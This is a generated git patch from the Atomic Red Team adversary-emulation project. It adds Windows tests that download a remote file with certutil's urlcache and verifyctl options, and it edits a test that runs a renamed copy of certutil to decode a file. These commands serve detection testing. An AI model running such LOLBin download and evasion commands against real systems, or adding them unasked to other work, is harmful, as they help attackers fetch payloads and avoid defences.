From a1c83527fb3c89979ffc11b5241a53cb047f100e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 14 Feb 2019 06:10:46 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1105/T1105.md | 46 ++++++++++++++++++++ atomics/T1140/T1140.md | 2 +- atomics/index.md | 4 ++ atomics/index.yaml | 92 +++++++++++++++++++++++++++++++++++++++- atomics/windows-index.md | 4 ++ 5 files changed, 146 insertions(+), 2 deletions(-) diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 7d0d43f8..f7915bdf 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -18,6 +18,10 @@ Adversaries may also copy files laterally between internal victim systems to sup - [Atomic Test #6 - sftp remote file copy (pull)](#atomic-test-6---sftp-remote-file-copy-pull) +- [Atomic Test #7 - certutil download (urlcache)](#atomic-test-7---certutil-download-urlcache) + +- [Atomic Test #8 - certutil download (verifyctl)](#atomic-test-8---certutil-download-verifyctl) +
@@ -145,3 +149,45 @@ Utilize sftp to perform a remote file copy (pull) sftp #{username}@#{remote_host}:#{remote_file} #{local_path} ```
+
+ +## Atomic Test #7 - certutil download (urlcache) +Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| +| local_path | Local path to place file | Path | Atomic-license.txt| + +#### Run it with `command_prompt`! +``` +cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} +``` +
+
+ +## Atomic Test #8 - certutil download (verifyctl) +Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| +| local_path | Local path to place file | Path | Atomic-license.txt| + +#### Run it with `powershell`! +``` +$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" +New-Item -Path $datePath -ItemType Directory +Set-Location $datePath +certutil -verifyctl -split -f #{remote_file} +Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} } +``` +
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index 0cefe524..6564c378 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -50,6 +50,6 @@ Rename certutil and decode a file. This is in reference to latest research by Fi #### Run it with `command_prompt`! ``` cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp -cmd.exe /c %temp%tcm.tmp -decode #{executable} +cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt ```
diff --git a/atomics/index.md b/atomics/index.md index a3a13a4f..0cb0b8b7 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -638,6 +638,8 @@ - Atomic Test #4: scp remote file copy (pull) [linux, macos] - Atomic Test #5: sftp remote file copy (push) [linux, macos] - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #7: certutil download (urlcache) [windows] + - Atomic Test #8: certutil download (verifyctl) [windows] - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -729,6 +731,8 @@ - Atomic Test #4: scp remote file copy (pull) [linux, macos] - Atomic Test #5: sftp remote file copy (push) [linux, macos] - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #7: certutil download (urlcache) [windows] + - Atomic Test #8: certutil download (verifyctl) [windows] - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/index.yaml b/atomics/index.yaml index 33d8956a..b00d80c0 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -5032,7 +5032,7 @@ defense-evasion: name: command_prompt command: | cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp - cmd.exe /c %temp%tcm.tmp -decode #{executable} + cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt T1089: technique: id: attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044 @@ -17764,6 +17764,51 @@ lateral-movement: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} ' + - name: certutil download (urlcache) + description: 'Use certutil -urlcache argument to download a file from the web. + Note - /urlcache also works! + +' + supported_platforms: + - windows + input_arguments: + remote_file: + description: URL of file to copy + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt + local_path: + description: Local path to place file + type: Path + default: Atomic-license.txt + executor: + name: command_prompt + command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} + +' + - name: certutil download (verifyctl) + description: 'Use certutil -verifyctl argument to download a file from the web. + Note - /verifyctl also works! + +' + supported_platforms: + - windows + input_arguments: + remote_file: + description: URL of file to copy + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt + local_path: + description: Local path to place file + type: Path + default: Atomic-license.txt + executor: + name: powershell + command: | + $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" + New-Item -Path $datePath -ItemType Directory + Set-Location $datePath + certutil -verifyctl -split -f #{remote_file} + Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} } T1077: technique: id: attack-pattern--ffe742ed-9100-4686-9e00-c331da544787 @@ -19561,6 +19606,51 @@ command-and-control: command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path} ' + - name: certutil download (urlcache) + description: 'Use certutil -urlcache argument to download a file from the web. + Note - /urlcache also works! + +' + supported_platforms: + - windows + input_arguments: + remote_file: + description: URL of file to copy + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt + local_path: + description: Local path to place file + type: Path + default: Atomic-license.txt + executor: + name: command_prompt + command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} + +' + - name: certutil download (verifyctl) + description: 'Use certutil -verifyctl argument to download a file from the web. + Note - /verifyctl also works! + +' + supported_platforms: + - windows + input_arguments: + remote_file: + description: URL of file to copy + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt + local_path: + description: Local path to place file + type: Path + default: Atomic-license.txt + executor: + name: powershell + command: | + $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" + New-Item -Path $datePath -ItemType Directory + Set-Location $datePath + certutil -verifyctl -split -f #{remote_file} + Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} } T1065: technique: id: attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0 diff --git a/atomics/windows-index.md b/atomics/windows-index.md index 7d81cc55..6c71eaf5 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -364,6 +364,8 @@ - [T1076 Remote Desktop Protocol](./T1076/T1076.md) - Atomic Test #1: RDP [windows] - [T1105 Remote File Copy](./T1105/T1105.md) + - Atomic Test #7: certutil download (urlcache) [windows] + - Atomic Test #8: certutil download (verifyctl) [windows] - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -505,6 +507,8 @@ - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) + - Atomic Test #7: certutil download (urlcache) [windows] + - Atomic Test #8: certutil download (verifyctl) [windows] - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)